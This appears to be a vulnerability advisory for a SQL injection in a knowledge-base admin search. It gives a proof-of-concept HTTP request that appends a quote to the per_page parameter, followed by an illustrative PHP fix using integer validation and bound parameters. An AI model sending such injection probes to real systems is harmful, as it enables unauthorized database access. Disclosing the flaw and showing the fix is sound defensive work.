The searchArticles function in the KB module calls the getSimpleResultSet function with the per_page parameter taken directly from user input. The value is not sanitized before it is placed into the query, so an attacker can manipulate the query.

GET /admin/kb?CSRFToken=4632faf87f0cd5fb8b324915263a01fa&_url=%2Fadmin%2Fkb&search=123&per_page=123' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Referer: http://localhost/admin/kb
Cookie: PHPSESSID=1nkrr4p8ikra2g2sov3fubp273
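
One way to close this class of flaw, shown as an added example that is not the project's own code: validate per_page as a bounded integer and bind it, rather than concatenating it into the query. The function names, the kb_article table, the limits and the in-memory SQLite database are assumptions made for this illustration (PHP 8 with pdo_sqlite).

```php
<?php
// Added illustration; not the project's code. Function names, the table
// schema and the limits below are assumptions made for this example.

const PER_PAGE_DEFAULT = 25;   // assumed default page size
const PER_PAGE_MAX     = 100;  // assumed upper bound

// Accept per_page only if it is a plain decimal integer within range;
// anything else (quotes, arrays, huge values) falls back to the default.
function normalizePerPage(mixed $raw): int
{
    $n = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => PER_PAGE_MAX],
    ]);
    return $n === false ? PER_PAGE_DEFAULT : $n;
}

// Hardened search: every user-supplied value is bound, none is concatenated.
function searchArticlesSafe(PDO $pdo, string $search, mixed $perPage): array
{
    $stmt = $pdo->prepare(
        'SELECT id, title FROM kb_article WHERE title LIKE :q ORDER BY id LIMIT :lim'
    );
    $stmt->bindValue(':q', '%' . $search . '%', PDO::PARAM_STR);
    $stmt->bindValue(':lim', normalizePerPage($perPage), PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE kb_article (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO kb_article (title) VALUES ('123 setup'), ('123 billing'), ('other')");

// The per_page value from the request above ("123'") fails validation and
// falls back to the default; a well-formed value is honoured.
var_dump(normalizePerPage("123'"));
var_dump(normalizePerPage('2'));
var_dump(count(searchArticlesSafe($pdo, '123', "123'")));
var_dump(count(searchArticlesSafe($pdo, '123', '1')));
```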